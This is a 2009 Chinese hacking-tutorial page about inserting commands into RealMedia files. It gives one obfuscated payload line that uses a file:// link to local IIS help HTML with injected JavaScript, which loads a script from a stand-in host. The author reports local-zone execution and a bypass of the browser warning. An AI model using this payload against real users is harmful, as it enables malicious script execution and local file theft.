当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > rm格式插入广告代码

黑客技术
深入了解系统日志文件,看看黑客是如何清除的
黑客技术:黑客怎样攻破SQL服务器系统
黑客技术:加密狗加密与破解教程(一)
中国邮与上海人才网等遭黑客挂马
黑客技术:瞬间破解锁定的网页
黑客技术:木马藏身之地
黑客技术:躲避黑客从这里做起
摆脱黑客攻击全攻略
混合攻击检测技术
谈黑客入侵的一些经验
IE浏览器主页频繁被强行修改的分析处理
制作ASP脚本组件实现重启服务器
黑客技术教程:制作一个微型QQ炸弹
黑客技术:教你破解QQ键盘保护
挂马大法汇总
黑客专家教你轻松解密Md5
教你追踪Windows系统登录时间
巧用XP系统安全模式卸载驱动
rundll32.exe大全
如何补救被黑客入侵的网站

黑客技术 中的 rm格式插入广告代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 99 ::
收藏到网摘: n/a

很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果.
复制代码 代码如下:

u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/


这段代码插进去会出现一个诡异的连接,点击下会执行我指定的js(微软的工程师还是很小心的,暂时正常情况下找到的html就这一个,而且还要点......),而且事实证明的确是本地域执行的,可以读本地的文件,呵呵......而且在realone播放的情况下,ie那个本地执行js代码的警告居然会神奇地消失,于是放到html页面播放,果然很郁闷,打开任何html都会警告,不过还是神奇地能打开本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到个本地存在问题的html就OK啦,呵呵.......
真希望这些边缘的地方能出点问题,我感觉还是可能的 :)